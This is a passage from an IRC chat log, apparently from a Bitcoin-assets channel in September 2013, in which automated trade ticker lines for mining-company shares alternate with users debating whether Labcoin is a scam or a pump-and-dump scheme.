! character. A good starting point for exploring the bot is the !facts command. You can also visit the bot's website for a list of help topics and documentation: http://gribble.sourceforge.net/ Sep 09 22:25:00 !facts Sep 09 22:25:12 hello. Sep 09 22:25:20 ;;whois Sep 09 22:25:20 Error: You don't have the network.whois capability. If you think that you should have this capability, be sure that you are identified before trying again. The 'whoami' command can tell you if you're identified. Sep 09 22:25:22 [HAVELOCK] [SDSTM] 20 @ 0.00310001 = 0.062 BTC [-] Sep 09 22:26:06 [HAVELOCK] [LABCO] 54 @ 0.0034999 = 0.189 BTC [+] Sep 09 22:26:08 [HAVELOCK] [LABCO] 446 @ 0.00349999 = 1.561 BTC [+] Sep 09 22:26:21 [HAVELOCK] [LABCO] 100 @ 0.00349999 = 0.35 BTC [+] Sep 09 22:26:25 [HAVELOCK] [XBOND] 10 @ 0.00109 = 0.0109 BTC [-] Sep 09 22:26:39 [HAVELOCK] [XBOND] 10 @ 0.00108011 = 0.0108 BTC [-] Sep 09 22:26:46 [HAVELOCK] [XBOND] 8 @ 0.00108011 = 0.0086 BTC [-] Sep 09 22:27:03 ;;8ball .0045 before .003? Sep 09 22:27:04 Of course. Sep 09 22:27:04 [HAVELOCK] [LABCO] 25 @ 0.00349999 = 0.0875 BTC [+] Sep 09 22:28:20 [BTCTC] [LABCOIN] 1 @ 0.0038 BTC [-] Sep 09 22:28:21 [BTCTC] [LABCOIN] 1958 @ 0.00389 = 7.6166 BTC [+] Sep 09 22:28:54 [BTCTC] [DMS.PURCHASE] 7 @ 0.01161 = 0.0813 BTC [-] Sep 09 22:28:56 [BTCTC] [DMS.PURCHASE] 10 @ 0.0116 = 0.116 BTC [-] Sep 09 22:28:57 [BTCTC] [DMS.PURCHASE] 10 @ 0.0115 = 0.115 BTC [-] Sep 09 22:28:58 [BTCTC] [DMS.PURCHASE] 33 @ 0.01125 = 0.3713 BTC [-] Sep 09 22:29:13 hello Sol_ Sep 09 22:31:37 [BTCTC] [LABCOIN] 596 @ 0.003772 = 2.2481 BTC [-] Sep 09 22:31:38 [BTCTC] [LABCOIN] 5 @ 0.003771 = 0.0189 BTC [-] Sep 09 22:31:39 [BTCTC] [LABCOIN] 196 @ 0.00377 = 0.7389 BTC [-] Sep 09 22:31:41 [BTCTC] [ACTIVEMINING] 500 @ 0.00325 = 1.625 BTC [+] Sep 09 22:31:43 [BTCTC] [ACTIVEMINING] 500 @ 0.00322 = 1.61 BTC [-] Sep 09 22:31:44 [BTCTC] [ACTIVEMINING] 1000 @ 0.00321 = 3.21 BTC [-] Sep 09 22:31:45 [BTCTC] [ACTIVEMINING] 274 @ 0.003203 = 0.8776 BTC [-] Sep 09 22:31:55 [BTCTC] [LABCOIN] 1904 @ 0.00377 = 7.1781 BTC [-] Sep 09 22:31:57 [BTCTC] [LABCOIN] 200 @ 0.00376 = 0.752 BTC [-] Sep 09 22:31:58 [BTCTC] [LABCOIN] 420 @ 0.00376 = 1.5792 BTC [-] Sep 09 22:31:59 [BTCTC] [LABCOIN] 135 @ 0.003754 = 0.5068 BTC [-] Sep 09 22:32:00 [BTCTC] [LABCOIN] 300 @ 0.003754 = 1.1262 BTC [-] Sep 09 22:32:03 [BTCTC] [LABCOIN] 492 @ 0.003754 = 1.847 BTC [-] Sep 09 22:32:07 [BTCTC] [LABCOIN] 104 @ 0.003762 = 0.3912 BTC [+] Sep 09 22:32:09 [BTCTC] [LABCOIN] 98 @ 0.003694 = 0.362 BTC [-] Sep 09 22:32:10 [BTCTC] [LABCOIN] 25 @ 0.003666 = 0.0917 BTC [-] Sep 09 22:32:11 [BTCTC] [LABCOIN] 100 @ 0.003665 = 0.3665 BTC [-] Sep 09 22:32:18 [BTCTC] [LABCOIN] 596 @ 0.003641 = 2.17 BTC [-] Sep 09 22:32:21 [BTCTC] [LABCOIN] 596 @ 0.003641 = 2.17 BTC [-] Sep 09 22:32:24 [BTCTC] [LABCOIN] 200 @ 0.003641 = 0.7282 BTC [-] Sep 09 22:32:28 herp Sep 09 22:32:34 [BTCTC] [LABCOIN] 200 @ 0.003641 = 0.7282 BTC [-] Sep 09 22:32:44 [BTCTC] [LABCOIN] 200 @ 0.003641 = 0.7282 BTC [-] Sep 09 22:32:54 [BTCTC] [LABCOIN] 96 @ 0.003641 = 0.3495 BTC [-] Sep 09 22:32:57 [BTCTC] [LABCOIN] 200 @ 0.003641 = 0.7282 BTC [-] Sep 09 22:32:59 [BTCTC] [TAT.ASICMINER] 42 @ 0.02275 = 0.9555 BTC [-] Sep 09 22:33:00 [BTCTC] [TAT.ASICMINER] 8 @ 0.02275 = 0.182 BTC [-] Sep 09 22:33:02 [BTCTC] [LABCOIN] 24 @ 0.003637 = 0.0873 BTC [-] Sep 09 22:33:05 [BTCTC] [LABCOIN] 200 @ 0.003637 = 0.7274 BTC [-] Sep 09 22:33:14 [BTCTC] [LABCOIN] 24 @ 0.003607 = 0.0866 BTC [-] Sep 09 22:33:16 [BTCTC] [LABCOIN] 369 @ 0.003605 = 1.3302 BTC [-] Sep 09 22:33:17 [BTCTC] [LABCOIN] 582 @ 0.003603 = 2.0969 BTC [-] Sep 09 22:33:26 [BTCTC] [ACTIVEMINING] 4 @ 0.003204 = 0.0128 BTC [+] Sep 09 22:33:26 [BTCTC] [ACTIVEMINING] 250 @ 0.003203 = 0.8008 BTC [-] Sep 09 22:33:28 [BTCTC] [ACTIVEMINING] 250 @ 0.003202 = 0.8005 BTC [-] Sep 09 22:33:30 [BTCTC] [LABCOIN] 1 @ 0.003754 BTC [+] Sep 09 22:33:48 [BTCTC] [TAT.ASICMINER] 42 @ 0.02275 = 0.9555 BTC [-] Sep 09 22:33:50 [BTCTC] [TAT.ASICMINER] 213 @ 0.02274 = 4.8436 BTC [-] Sep 09 22:33:51 [BTCTC] [TAT.ASICMINER] 1 @ 0.0227 BTC [-] Sep 09 22:33:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.02261 BTC [-] Sep 09 22:33:53 [BTCTC] [TAT.ASICMINER] 100 @ 0.0226 = 2.26 BTC [-] Sep 09 22:33:54 [BTCTC] [TAT.ASICMINER] 1 @ 0.0222 BTC [-] Sep 09 22:33:55 [BTCTC] [LABCOIN] 2 @ 0.0038 = 0.0076 BTC [+] Sep 09 22:33:56 [BTCTC] [TAT.ASICMINER] 29 @ 0.02211 = 0.6412 BTC [-] Sep 09 22:33:57 [BTCTC] [TAT.ASICMINER] 20 @ 0.0221 = 0.442 BTC [-] Sep 09 22:33:58 [BTCTC] [LABCOIN] 200 @ 0.003798 = 0.7596 BTC [-] Sep 09 22:33:59 [BTCTC] [TAT.ASICMINER] 55 @ 0.02209 = 1.215 BTC [-] Sep 09 22:34:00 [BTCTC] [LABCOIN] 455 @ 0.003799 = 1.7285 BTC [+] Sep 09 22:34:01 [BTCTC] [TAT.ASICMINER] 1 @ 0.02201 BTC [-] Sep 09 22:34:03 [BTCTC] [TAT.ASICMINER] 8 @ 0.022 = 0.176 BTC [-] Sep 09 22:34:04 [BTCTC] [LABCOIN] 300 @ 0.003754 = 1.1262 BTC [-] Sep 09 22:34:05 [BTCTC] [TAT.ASICMINER] 52 @ 0.022 = 1.144 BTC [-] Sep 09 22:34:16 [BTCTC] [LABCOIN] 200 @ 0.003754 = 0.7508 BTC [-] Sep 09 22:34:19 [BTCTC] [LABCOIN] 1499 @ 0.003754 = 5.6272 BTC [-] Sep 09 22:34:20 [BTCTC] [LABCOIN] 82 @ 0.003644 = 0.2988 BTC [-] Sep 09 22:34:21 [BTCTC] [LABCOIN] 10 @ 0.003798 = 0.038 BTC [+] Sep 09 22:34:31 [BTCTC] [LABCOIN] 30 @ 0.003754 = 0.1126 BTC [-] Sep 09 22:34:36 [HAVELOCK] [AM100] 4 @ 0.023195 = 0.0928 BTC [+] Sep 09 22:34:58 [BTCTC] [LABCOIN] 60 @ 0.003642 = 0.2185 BTC [-] Sep 09 22:34:59 [BTCTC] [LABCOIN] 10 @ 0.003637 = 0.0364 BTC [-] Sep 09 22:35:01 [BTCTC] [LABCOIN] 24 @ 0.003608 = 0.0866 BTC [-] Sep 09 22:35:02 [BTCTC] [LABCOIN] 186 @ 0.003603 = 0.6702 BTC [-] Sep 09 22:35:03 [BTCTC] [LABCOIN] 500 @ 0.003601 = 1.8005 BTC [-] Sep 09 22:35:04 [BTCTC] [LABCOIN] 1000 @ 0.0036 = 3.6 BTC [-] Sep 09 22:35:05 [BTCTC] [LABCOIN] 1000 @ 0.0036 = 3.6 BTC [-] Sep 09 22:35:06 [BTCTC] [LABCOIN] 25 @ 0.003579 = 0.0895 BTC [-] Sep 09 22:35:09 [BTCTC] [LABCOIN] 100 @ 0.003578 = 0.3578 BTC [-] Sep 09 22:35:09 [BTCTC] [LABCOIN] 195 @ 0.003552 = 0.6926 BTC [-] Sep 09 22:36:34 [HAVELOCK] [AM1] 1 @ 2.4394 BTC [+] Sep 09 22:37:16 i didn't sum the ongoing sells but there is one player with 25k shares which were placed sub .004 for a few seconds Sep 09 22:37:46 [BTCTC] [LTC-ATF.B2] 56 @ 0.01049 = 0.5874 BTC [-] Sep 09 22:37:52 [BTCTC] [LABCOIN] 1 @ 0.003752 BTC [+] Sep 09 22:38:43 [BTCTC] [LTC-ATF.B2] 44 @ 0.01045 = 0.4598 BTC [-] Sep 09 22:38:52 [BTCTC] [LABCOIN] 500 @ 0.003749 = 1.8745 BTC [-] Sep 09 22:39:10 labcoin lol.. Sep 09 22:39:46 how do you think they will weasel out of request for pics? Sep 09 22:40:33 Labcoin is a legit unlegit thing. They can send legit unlegit pictures. Sep 09 22:41:03 hex dexX7 QFP44PIN.JPG is edited Sep 09 22:41:49 [BTCTC] [LABCOIN] 180 @ 0.003746 = 0.6743 BTC [-] Sep 09 22:41:50 [HAVELOCK] [AM100] 1 @ 0.02319 BTC [-] Sep 09 22:41:51 utter fail http://www.alydian.co/ Sep 09 22:41:54 ;;seen Duffer1 Sep 09 22:41:54 Duffer1 was last seen in #bitcoin-assets 2 hours, 29 minutes, and 45 seconds ago: thank you :) Sep 09 22:42:12 [BTCTC] [LABCOIN] 526 @ 0.003743 = 1.9688 BTC [-] Sep 09 22:42:13 [BTCTC] [LABCOIN] 1014 @ 0.003745 = 3.7974 BTC [+] Sep 09 22:42:14 [BTCTC] [LABCOIN] 460 @ 0.003746 = 1.7232 BTC [+] Sep 09 22:42:18 *maybe* they are legit, but they are definitely playing with the stock prices Sep 09 22:42:50 khalunis: saw the post right now Sep 09 22:43:01 [BTCTC] [LABCOIN] 500 @ 0.003746 = 1.873 BTC [+] Sep 09 22:43:27 [BTCTC] [LABCOIN] 100 @ 0.003744 = 0.3744 BTC [-] Sep 09 22:43:28 Game of Scams Sep 09 22:43:29 [BTCTC] [LABCOIN] 100 @ 0.003744 = 0.3744 BTC [-] Sep 09 22:43:30 [BTCTC] [LABCOIN] 211 @ 0.003608 = 0.7613 BTC [-] Sep 09 22:43:31 [BTCTC] [LABCOIN] 54 @ 0.003606 = 0.1947 BTC [-] Sep 09 22:43:32 dexX7: these chips are on taobao with other logo, EXIF is from italian language pc and taken from same photo as fabrizio Sep 09 22:43:33 [BTCTC] [LABCOIN] 5 @ 0.003604 = 0.018 BTC [-] Sep 09 22:43:35 [BTCTC] [LABCOIN] 1322 @ 0.003601 = 4.7605 BTC [-] Sep 09 22:43:37 [BTCTC] [LABCOIN] 290 @ 0.0036 = 1.044 BTC [-] Sep 09 22:43:38 [BTCTC] [LABCOIN] 5000 @ 0.0036 = 18 BTC [-] Sep 09 22:43:40 [BTCTC] [LABCOIN] 98 @ 0.003577 = 0.3505 BTC [-] Sep 09 22:43:40 [BTCTC] [LABCOIN] 962 @ 0.003576 = 3.4401 BTC [-] Sep 09 22:43:41 [BTCTC] [LABCOIN] 3850 @ 0.003575 = 13.7638 BTC [-] Sep 09 22:43:42 [BTCTC] [LABCOIN] 500 @ 0.003561 = 1.7805 BTC [-] Sep 09 22:43:44 [BTCTC] [LABCOIN] 1702 @ 0.00356 = 6.0591 BTC [-] Sep 09 22:43:51 Musical Scams Sep 09 22:43:53 [BTCTC] [LABCOIN] 40 @ 0.003746 = 0.1498 BTC [+] Sep 09 22:43:56 [BTCTC] [LABCOIN] 5 @ 0.003747 = 0.0187 BTC [+] Sep 09 22:43:57 hahaha Sep 09 22:43:58 [BTCTC] [LABCOIN] 428 @ 0.003796 = 1.6247 BTC [+] Sep 09 22:43:59 [BTCTC] [LABCOIN] 96 @ 0.003798 = 0.3646 BTC [+] Sep 09 22:44:00 [BTCTC] [LABCOIN] 100 @ 0.003842 = 0.3842 BTC [+] Sep 09 22:44:01 [BTCTC] [LABCOIN] 96 @ 0.003872 = 0.3717 BTC [+] Sep 09 22:44:02 [BTCTC] [LABCOIN] 1250 @ 0.003888 = 4.86 BTC [+] Sep 09 22:44:10 [BTCTC] [LABCOIN] 40 @ 0.003888 = 0.1555 BTC [+] Sep 09 22:44:12 [BTCTC] [LABCOIN] 50 @ 0.003746 = 0.1873 BTC [-] Sep 09 22:44:17 really? can you share a link? Sep 09 22:44:25 [BTCTC] [BASIC-MINING] 1 @ 0.1155 BTC [-] Sep 09 22:44:35 [BTCTC] [LABCOIN] 585 @ 0.003746 = 2.1914 BTC [-] Sep 09 22:44:36 [BTCTC] [LABCOIN] 256 @ 0.003607 = 0.9234 BTC [-] Sep 09 22:44:38 [BTCTC] [LABCOIN] 99 @ 0.003605 = 0.3569 BTC [-] Sep 09 22:44:39 [BTCTC] [LABCOIN] 72 @ 0.00358 = 0.2578 BTC [-] Sep 09 22:44:40 [BTCTC] [LABCOIN] 100 @ 0.003577 = 0.3577 BTC [-] Sep 09 22:44:42 [BTCTC] [LABCOIN] 74 @ 0.003561 = 0.2635 BTC [-] Sep 09 22:44:42 [BTCTC] [LABCOIN] 298 @ 0.00356 = 1.0609 BTC [-] Sep 09 22:44:43 [BTCTC] [LABCOIN] 23 @ 0.003556 = 0.0818 BTC [-] Sep 09 22:44:44 [BTCTC] [LABCOIN] 92 @ 0.003555 = 0.3271 BTC [-] Sep 09 22:44:45 [BTCTC] [LABCOIN] 24 @ 0.00355 = 0.0852 BTC [-] Sep 09 22:44:46 [BTCTC] [LABCOIN] 99 @ 0.003549 = 0.3514 BTC [-] Sep 09 22:44:48 [BTCTC] [LABCOIN] 24 @ 0.003521 = 0.0845 BTC [-] Sep 09 22:44:49 [BTCTC] [LABCOIN] 98 @ 0.00352 = 0.345 BTC [-] Sep 09 22:44:50 [BTCTC] [LABCOIN] 1312 @ 0.003511 = 4.6064 BTC [-] Sep 09 22:44:51 [BTCTC] [LABCOIN] 4404 @ 0.00351 = 15.458 BTC [-] Sep 09 22:45:03 [BTCTC] [LABCOIN] 500 @ 0.003746 = 1.873 BTC [+] Sep 09 22:45:09 [BTCTC] [LABCOIN] 750 @ 0.0036 = 2.7 BTC [-] Sep 09 22:45:15 i guess they are waiting for bitfurys to make 4TH Sep 09 22:45:16 [BTCTC] [DMS.MINING] 4 @ 0.002517 = 0.0101 BTC [-] Sep 09 22:45:29 [BTCTC] [ACTIVEMINING] 1 @ 0.003355 BTC [+] Sep 09 22:45:52 [BTCTC] [LABCOIN] 475 @ 0.003788 = 1.7993 BTC [+] Sep 09 22:45:53 Labcoin is a legit unlegit thing. They can send legit unlegit pictures. << bwahaha Sep 09 22:45:53 [BTCTC] [LABCOIN] 271 @ 0.00379 = 1.0271 BTC [+] Sep 09 22:45:53 the swede aquired a lot of miners in the past weeks, "for reselling on ebay" Sep 09 22:45:55 [BTCTC] [LABCOIN] 754 @ 0.003795 = 2.8614 BTC [+] Sep 09 22:46:19 [BTCTC] [LABCOIN] 3 @ 0.003785 = 0.0114 BTC [-] Sep 09 22:46:21 :) not hard to see what is going on Sep 09 22:46:26 dexX7: these chips are on taobao with other logo, EXIF is from italian language pc and taken from same photo as fabrizio <<. Sep 09 22:46:38 yes mircea_popescu Sep 09 22:46:38 khalunis do we know you under a diff nick ? Sep 09 22:46:41 yes Sep 09 22:46:42 [BTCTC] [BASIC-MINING] 1 @ 0.115 BTC [-] Sep 09 22:46:43 [BTCTC] [BASIC-MINING] 23 @ 0.1144 = 2.6312 BTC [-] Sep 09 22:46:48 [MPEX] [S.MPOE] 7000 @ 0.00089433 = 6.2603 BTC [+] Sep 09 22:46:51 are you nickwen Sep 09 22:46:52 ? Sep 09 22:46:54 nop Sep 09 22:46:56 or anotheranon? Sep 09 22:46:56 [BTCTC] [LABCOIN] 1492 @ 0.003787 = 5.6502 BTC [+] Sep 09 22:46:57 [BTCTC] [LABCOIN] 508 @ 0.00379 = 1.9253 BTC [+] Sep 09 22:47:07 well who ? Sep 09 22:47:13 dvd-rewritable Sep 09 22:47:18 [BTCTC] [LABCOIN] 3992 @ 0.00379 = 15.1297 BTC [+] Sep 09 22:47:19 ahaha get out. Sep 09 22:47:30 uff how rude Sep 09 22:47:31 [BTCTC] [B.YABMC] 1 @ 0.00099 BTC [+] Sep 09 22:48:07 [BTCTC] [LABCOIN] 1000 @ 0.003889 = 3.889 BTC [+] Sep 09 22:48:13 [BTCTC] [LABCOIN] 800 @ 0.003889 = 3.1112 BTC [+] Sep 09 22:48:14 [BTCTC] [LABCOIN] 400 @ 0.00389 = 1.556 BTC [+] Sep 09 22:48:16 [BTCTC] [ASICMINER-PT] 1 @ 2.453 BTC [+] Sep 09 22:48:19 [BTCTC] [LABCOIN] 500 @ 0.00389 = 1.945 BTC [+] Sep 09 22:48:37 [BTCTC] [LABCOIN] 231 @ 0.003898 = 0.9004 BTC [+] Sep 09 22:48:39 [BTCTC] [LABCOIN] 100 @ 0.003899 = 0.3899 BTC [+] Sep 09 22:48:40 [BTCTC] [LABCOIN] 669 @ 0.0039 = 2.6091 BTC [+] Sep 09 22:48:41 ha i guess i was off by about a day, brb making popcorn to go with this labcoin craziness Sep 09 22:48:42 [BTCTC] [LABCOIN] 331 @ 0.003899 = 1.2906 BTC [-] Sep 09 22:48:42 [BTCTC] [LABCOIN] 100 @ 0.00389 = 0.389 BTC [-] Sep 09 22:48:58 [BTCTC] [LABCOIN] 236 @ 0.003889 = 0.9178 BTC [-] Sep 09 22:49:00 [BTCTC] [LABCOIN] 95 @ 0.00389 = 0.3696 BTC [+] Sep 09 22:49:01 [BTCTC] [LABCOIN] 84 @ 0.00389 = 0.3268 BTC [+] Sep 09 22:49:07 khalunis no, seriously ? Sep 09 22:49:12 what Sep 09 22:49:13 [BTCTC] [LABCOIN] 416 @ 0.0039 = 1.6224 BTC [+] Sep 09 22:49:18 [BTCTC] [LABCOIN] 52 @ 0.0039 = 0.2028 BTC [+] Sep 09 22:49:21 khalunis you're dvdrewritable on the forum ? Sep 09 22:49:31 "we will deploy the same mechanism ASICMINER uses for signing found blocks and publish them on our website" Sep 09 22:49:33 Duffer1 wait, did we bet on the move or didnt we ? :D Sep 09 22:49:40 a new thing to wait for then Sep 09 22:49:48 [BTCTC] [LABCOIN] 130 @ 0.0039 = 0.507 BTC [+] Sep 09 22:49:53 i didn't see anything about a bet Sep 09 22:49:54 http://www.youtube.com/watch?v=C9mfuifkZgc Sep 09 22:49:58 http://i.qkme.me/3vqiky.jpg Sep 09 22:49:59 Ca$h Out - Cashin' Out - YouTube Sep 09 22:49:59 [BTCTC] [LABCOIN] 127 @ 0.0039 = 0.4953 BTC [+] Sep 09 22:50:02 [BTCTC] [LABCOIN] 800 @ 0.0039 = 3.12 BTC [+] Sep 09 22:50:15 but was i right or was i right? :P Sep 09 22:50:25 [BTCTC] [LABCOIN] 250 @ 0.0039 = 0.975 BTC [+] Sep 09 22:50:25 [BTCTC] [DMS.SELLING] 2 @ 0.009351 = 0.0187 BTC [-] Sep 09 22:50:27 [BTCTC] [DMS.SELLING] 98 @ 0.00935 = 0.9163 BTC [-] Sep 09 22:50:28 [BTCTC] [ASICMINER-PT] 1 @ 2.454 BTC [+] Sep 09 22:51:06 [BTCTC] [LABCOIN] 2 @ 0.0039 = 0.0078 BTC [+] Sep 09 22:51:08 [BTCTC] [LABCOIN] 100 @ 0.0039 = 0.39 BTC [+] Sep 09 22:51:13 [BTCTC] [LABCOIN] 404 @ 0.0039 = 1.5756 BTC [+] Sep 09 22:51:40 [BTCTC] [DMS.MINING] 3 @ 0.002517 = 0.0076 BTC [-] Sep 09 22:51:55 [BTCTC] [LABCOIN] 150 @ 0.003944 = 0.5916 BTC [+] Sep 09 22:52:06 [BTCTC] [LABCOIN] 240 @ 0.003944 = 0.9466 BTC [+] Sep 09 22:52:11 khalunis: link to taobao? Sep 09 22:52:15 Duffer1 obviously not!!11 i was right! Sep 09 22:52:22 [BTCTC] [LABCOIN] 100 @ 0.003944 = 0.3944 BTC [+] Sep 09 22:52:22 because of what a unit meansa. Sep 09 22:52:48 [BTCTC] [DMS.MINING] 1 @ 0.002517 BTC [-] Sep 09 22:53:01 to the moon and beyond alice Sep 09 22:53:05 [BTCTC] [LABCOIN] 610 @ 0.003944 = 2.4058 BTC [+] Sep 09 22:53:15 [BTCTC] [LABCOIN] 3 @ 0.003944 = 0.0118 BTC [+] Sep 09 22:53:16 .d Sep 09 22:53:16 86933017.77119 | Next Diff in 1058 blocks | Estimated Change: 17.7818% in 6d 0h 55m 25s Sep 09 22:53:32 gecko_x2 get a grip dood. Sep 09 22:53:35 how was i wrong? look at that movement Sep 09 22:53:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.023 BTC [+] Sep 09 22:53:49 Duffer1 well basically scammors tried to push it, it got sold into the ground, they keep trying Sep 09 22:53:55 and its gonna get sold into the ground further. Sep 09 22:53:57 but anyway! Sep 09 22:54:12 [BTCTC] [LABCOIN] 6 @ 0.003944 = 0.0237 BTC [+] Sep 09 22:54:26 it will rise to unimaginable heights Sep 09 22:54:29 [BTCTC] [ACTIVEMINING] 8 @ 0.003202 = 0.0256 BTC [-] Sep 09 22:54:41 showering holders with untold riches Sep 09 22:54:48 gecko_gs2 depends how much btc sweedeguy is willing to throw down the drain. Sep 09 22:54:48 you have me confused mp :P Sep 09 22:54:57 [BTCTC] [LABCOIN] 100 @ 0.003944 = 0.3944 BTC [+] Sep 09 22:54:59 Duffer1 it's what i do best. Sep 09 22:55:12 [BTCTC] [LABCOIN] 4404 @ 0.00351 = 15.458 BTC [-] < Sep 09 22:55:21 khalunis: the timing and effort put into this and past actions by you (or your team) almost lets me think that labcoin is real :S Sep 09 22:55:27 [BTCTC] [ACTIVEMINING] 2 @ 0.003201 = 0.0064 BTC [-] Sep 09 22:55:29 [BTCTC] [ACTIVEMINING] 2905 @ 0.0032 = 9.296 BTC [-] Sep 09 22:55:36 dexX7: ?? Sep 09 22:55:38 [BTCTC] [LABCOIN] 2 @ 0.003944 = 0.0079 BTC [+] Sep 09 22:55:41 ya srsly. ?? Sep 09 22:56:14 lol Sep 09 22:56:16 kinda Sep 09 22:56:22 [BTCTC] [LABCOIN] 50 @ 0.003901 = 0.1951 BTC [-] Sep 09 22:56:23 [BTCTC] [LABCOIN] 100 @ 0.0039 = 0.39 BTC [-] Sep 09 22:56:23 they might be real, but they are not worth investing into; what mostly happens is them pumping and dumping their stock Sep 09 22:56:33 [BTCTC] [ACTIVEMINING] 1000 @ 0.003201 = 3.201 BTC [+] Sep 09 22:57:20 https://bitcointalk.org/index.php?topic=263445.msg3116317#msg3116317 lol Sep 09 22:57:22 [BTCTC] [LABCOIN] 800 @ 0.0039 = 3.12 BTC [-] Sep 09 22:57:24 [LABCOIN] IPO [BTCT.CO] - Details/FAQ and Discussion (ASIC dev/sales/mining) Sep 09 22:57:33 [BTCTC] [LABCOIN] 2000 @ 0.0039 = 7.8 BTC [-] Sep 09 22:57:37 [HAVELOCK] [LABCO] 30 @ 0.0035 = 0.105 BTC [+] Sep 09 22:57:46 [BTCTC] [LABCOIN] 125 @ 0.003891 = 0.4864 BTC [-] Sep 09 22:58:05 lol pankkake Sep 09 22:58:07 [BTCTC] [LABCOIN] 250 @ 0.00389 = 0.9725 BTC [-] Sep 09 22:58:20 [BTCTC] [LABCOIN] 386 @ 0.003871 = 1.4942 BTC [-] Sep 09 22:58:21 Made about 75 btc profit on this stock, so I guess I can't be too mad. Sep 09 22:58:21 But I'm pretty positive on the fact now that this is a scam. So fuck you, LC. Sep 09 22:58:21 You know what the worst part is? MP was right. Another fuck you for that. Sep 09 22:58:22 lmao Sep 09 22:58:24 wow did on of cheerleaders say popescu was right Sep 09 22:58:33 apparently Sep 09 22:58:39 Never admit defeat Sep 09 22:58:46 anyway, the leeching by random people of scammers attempts to scam is fucking beautiful. Sep 09 22:59:14 im interest whether people actually beleive or they just got $ in their eyes Sep 09 22:59:17 [BTCTC] [LABCOIN] 5 @ 0.003653 = 0.0183 BTC [-] Sep 09 22:59:18 [BTCTC] [LABCOIN] 2500 @ 0.003652 = 9.13 BTC [-] Sep 09 22:59:20 [BTCTC] [LABCOIN] 5000 @ 0.003651 = 18.255 BTC [-] Sep 09 22:59:21 [BTCTC] [LABCOIN] 412 @ 0.003631 = 1.496 BTC [-] Sep 09 22:59:22 [BTCTC] [LABCOIN] 825 @ 0.00363 = 2.9948 BTC [-] Sep 09 22:59:23 [BTCTC] [LABCOIN] 3205 @ 0.003622 = 11.6085 BTC [-] Sep 09 22:59:24 [BTCTC] [LABCOIN] 3307 @ 0.003621 = 11.9746 BTC [-] Sep 09 22:59:25 [BTCTC] [LABCOIN] 3000 @ 0.00362 = 10.86 BTC [-] Sep 09 22:59:26 [BTCTC] [LABCOIN] 2000 @ 0.003612 = 7.224 BTC [-] Sep 09 22:59:27 [BTCTC] [LABCOIN] 1000 @ 0.003611 = 3.611 BTC [-] Sep 09 22:59:28 [BTCTC] [LABCOIN] 3000 @ 0.003611 = 10.833 BTC [-] Sep 09 22:59:29 [BTCTC] [LABCOIN] 4100 @ 0.003603 = 14.7723 BTC [-] Sep 09 22:59:30 [BTCTC] [LABCOIN] 2000 @ 0.003602 = 7.204 BTC [-] Sep 09 22:59:31 [BTCTC] [LABCOIN] 6000 @ 0.0036 = 21.6 BTC [-] Sep 09 22:59:32 [BTCTC] [LABCOIN] 50 @ 0.003571 = 0.1786 BTC [-] Sep 09 22:59:33 [BTCTC] [LABCOIN] 100 @ 0.00357 = 0.357 BTC [-] Sep 09 22:59:34 [BTCTC] [LABCOIN] 1496 @ 0.003551 = 5.3123 BTC [-] Sep 09 22:59:38 o wow Duffer1 ! look at that! Sep 09 22:59:49 back to 35. teh wow. teh incredible. movement!!! Sep 09 22:59:51 lol Sep 09 23:00:05 That's a sell off Sep 09 23:00:08 oh i see Sep 09 23:00:33 fucking ridiculous, exactly what i said two hours ago. Sep 09 23:00:45 scammers should read this chan more carefully i guess. Sep 09 23:01:12 look at amc the vision 28nm revolutionary miner . the reality: few avalons shared between hungry dogs Sep 09 23:01:34 i meant volume movement as well as price movement Sep 09 23:01:42 yeh i know. Sep 09 23:01:56 [BTCTC] [LABCOIN] 1 @ 0.0037 BTC [+] Sep 09 23:01:58 [BTCTC] [LABCOIN] 1 @ 0.003799 BTC [+] Sep 09 23:02:01 [BTCTC] [ASICMINER-PT] 1 @ 2.511 BTC [+] Sep 09 23:02:17 i still think it'll get a crazier before it levels off Sep 09 23:02:55 https://bitcointalk.org/index.php?topic=263445.msg3031757#msg3031757 << post history of those 4 is relevant. many shiny pictures and even a pdf with "facts" proving labcoin is scamming. i'm sure this is "coordinated". and the amount of work + precise timing of the posts raises the question "why do they care so much"? Sep 09 23:02:57 [BTCTC] [ACTIVEMINING] 135 @ 0.003337 = 0.4505 BTC [+] Sep 09 23:02:59 [BTCTC] [ACTIVEMINING] 10 @ 0.003338 = 0.0334 BTC [+] Sep 09 23:03:00 [LABCOIN] IPO [BTCT.CO] - Details/FAQ and Discussion (ASIC dev/sales/mining) Sep 09 23:03:00 [BTCTC] [ACTIVEMINING] 10 @ 0.003339 = 0.0334 BTC [+] Sep 09 23:03:01 [BTCTC] [ACTIVEMINING] 125 @ 0.00334 = 0.4175 BTC [+] Sep 09 23:03:02 [BTCTC] [ACTIVEMINING] 320 @ 0.003363 = 1.0762 BTC [+] Sep 09 23:03:03 [BTCTC] [ACTIVEMINING] 320 @ 0.003364 = 1.0765 BTC [+] Sep 09 23:03:04 [BTCTC] [ACTIVEMINING] 523 @ 0.003394 = 1.7751 BTC [+] Sep 09 23:03:04 [BTCTC] [ACTIVEMINING] 523 @ 0.003396 = 1.7761 BTC [+] Sep 09 23:03:05 lol Sep 09 23:03:05 [BTCTC] [ACTIVEMINING] 184 @ 0.003399 = 0.6254 BTC [+] Sep 09 23:03:36 i really enjoy that gif dex Sep 09 23:03:38 it's too far fetched to conclude that labcoin is no scam based on this, but having a team of 2+ chinese sure is an indicator =D Sep 09 23:03:41 me too Sep 09 23:03:45 can't stop watching ;) Sep 09 23:03:45 dexX7: oh there is more pdf Sep 09 23:03:57 [BTCTC] [ACTIVEMINING] 250 @ 0.003399 = 0.8498 BTC [+] Sep 09 23:04:00 [BTCTC] [ACTIVEMINING] 60 @ 0.003399 = 0.2039 BTC [+] Sep 09 23:04:26 [BTCTC] [LABCOIN] 5 @ 0.00371 = 0.0186 BTC [-] Sep 09 23:05:33 yea, but the pdf i saw was just stupid and stuffed with non relevant content and pseudo-proofs Sep 09 23:05:57 want helping hand and concrete-proofs for free? Sep 09 23:06:23 sure Sep 09 23:06:34 well that's rainbows and unicorns land Sep 09 23:07:49 [BTCTC] [LABCOIN] 80 @ 0.00367 = 0.2936 BTC [-] Sep 09 23:07:56 https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/8586232139512745659665e468ee9235/tumblr_mnmpr2xauC1qz5qzmo1_500.gif this one? ;) Sep 09 23:08:01 [BTCTC] [LABCOIN] 3227 @ 0.003698 = 11.9334 BTC [+] Sep 09 23:08:03 [BTCTC] [LABCOIN] 300 @ 0.003699 = 